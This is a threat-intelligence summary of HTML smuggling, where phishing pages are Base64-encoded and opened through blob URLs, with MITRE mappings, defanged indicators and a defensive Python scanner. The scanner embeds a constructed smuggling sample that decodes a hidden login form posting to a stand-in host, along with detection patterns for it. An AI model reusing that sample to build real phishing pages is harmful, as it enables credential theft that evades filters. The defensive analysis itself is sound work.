HTML Smuggling: Exploiting Blob URLs for Phishing Attacks

HTML smuggling encodes HTML as Base64 and loads it in the browser via blob URLs, enabling phishing pages to evade many security checks. Trustwave SpiderLabs documented campaigns impersonating brands like American Express, with samples tied to DocuSign and Microsoft and hosted in a Cloudflare R2 bucket. #HTMLSmuggling #BlobURL #TrustwaveSpiderLabs #AmericanExpress #DocuSign #Microsoft #CloudflareR2

Keypoints

  • HTML smuggling enables attackers to generate malicious files directly in the browser using JavaScript.
  • Phishing emails can redirect users to blob URLs that host encoded HTML phishing pages.
  • Blob URLs let the browser assemble the page or file locally from the decoded data, so the content never crosses the network as an ordinary HTML file and can evade traditional security filters.
  • Attackers can distribute harmful payloads disguised as legitimate files.
  • The technique complicates detection by security systems.
  • Future phishing attacks are expected to grow more sophisticated by leveraging HTML smuggling.
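The keypoints above describe the delivery mechanism: a long Base64 string in the attachment, decoded by JavaScript and turned into a blob URL in the browser. As an added illustration (not code from the Trustwave report), the following Python scanner shows how a defender can triage an HTML attachment for this pattern: it looks for the atob / Blob / createObjectURL API trio, decodes any long Base64 literal it finds, and checks whether the decoded data is itself an HTML page with a password field. The sample attachment, the 100-character Base64 threshold and the scoring weights are constructed assumptions for the demonstration, not values taken from the campaign.

```python
import base64
import binascii
import re

# Constructed sample (assumption, not a real campaign artifact): a small login
# form is Base64-encoded and unpacked in the browser via a blob URL, which is
# the shape of page the keypoints describe.
INNER_PAGE = (
    "<html><body><form action='https://example.invalid/login' method='post'>"
    "<input name='user'><input type='password' name='pass'></form></body></html>"
)
SAMPLE_HTML = f"""<html><body><script>
var d = "{base64.b64encode(INNER_PAGE.encode()).decode()}";
var b = new Blob([atob(d)], {{type: "text/html"}});
window.location = URL.createObjectURL(b);
</script></body></html>"""

# The three browser APIs that together implement the smuggling step.
SMUGGLING_APIS = {
    "atob": re.compile(r"\batob\s*\("),
    "Blob": re.compile(r"\bnew\s+Blob\s*\("),
    "createObjectURL": re.compile(r"\bURL\.createObjectURL\s*\("),
}

# A quoted run of Base64 characters; 100 chars is an assumed triage threshold,
# real smuggled pages carry strings that are tens of kilobytes long.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{100,}={0,2})['\"]")


def decode_embedded_payloads(html):
    """Return the raw bytes of every long Base64 literal that decodes cleanly."""
    payloads = []
    for match in B64_LITERAL.finditer(html):
        try:
            payloads.append(base64.b64decode(match.group(1), validate=True))
        except (binascii.Error, ValueError):
            continue  # not valid Base64, ignore (e.g. a long hash or token)
    return payloads


def analyze(html):
    """Score an HTML attachment for HTML-smuggling indicators."""
    apis = [name for name, rx in SMUGGLING_APIS.items() if rx.search(html)]
    findings = []
    for payload in decode_embedded_payloads(html):
        text = payload.decode("utf-8", errors="replace")
        findings.append({
            "bytes": len(payload),
            # decoded data is itself markup, i.e. a page hidden inside a page
            "decodes_to_html": bool(re.search(r"<\s*(html|script|form)", text, re.I)),
            # decoded page asks for a password: credential phishing
            "password_field": bool(
                re.search(r"type\s*=\s*['\"]password['\"]", text, re.I)
            ),
        })
    # Assumed weights: one point per API, two per decoded HTML payload, two more
    # if that payload contains a password field.
    score = len(apis)
    score += sum(2 for f in findings if f["decodes_to_html"])
    score += sum(2 for f in findings if f["password_field"])
    return {
        "apis": apis,
        "payloads": findings,
        "score": score,
        "verdict": "suspicious" if score >= 3 else "benign",
    }


if __name__ == "__main__":
    print(analyze(SAMPLE_HTML))
    print(analyze("<html><body><p>quarterly report</p></body></html>"))
```

Running the block prints a suspicious verdict for the constructed sample (all three APIs present, one decoded HTML payload with a password field) and a benign verdict for the plain page. In practice the decoded payload is what you hand to the next stage, for example an HTML sandbox or a URL extractor, since that is the page the victim actually sees.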

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – “Use of phishing emails to deliver malicious payloads.”
  • [T1059.007] JavaScript – “Execution of JavaScript code to decode and display phishing content.”
  • [T1027] Obfuscated/Compressed Files and Information – “The actual HTML phishing page is encoded in a long Base64 string.”
  • [T1078] Valid Accounts – “Phishing techniques aimed at stealing user credentials.”

Indicators of Compromise

  • [URL] Phishing-related redirects and hosting domains – https://www.imperauto[.]com[.]br/tmp/Y8Z57m, https://csp[.]wsiz[.]pl/wp-admin/one[.]htm, and 1 more related URL
  • [Blob URL] Blob URI used to host the decoded HTML content – blob:hxxps://pub-bbe243ba90f4462ea7249d1206164f64[.]r2[.]dev/013a95bc-e14b-40b6-9524-762cfa05262b

Read more: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/html-smuggling-how-blob-urls-are-abused-to-deliver-phishing-content/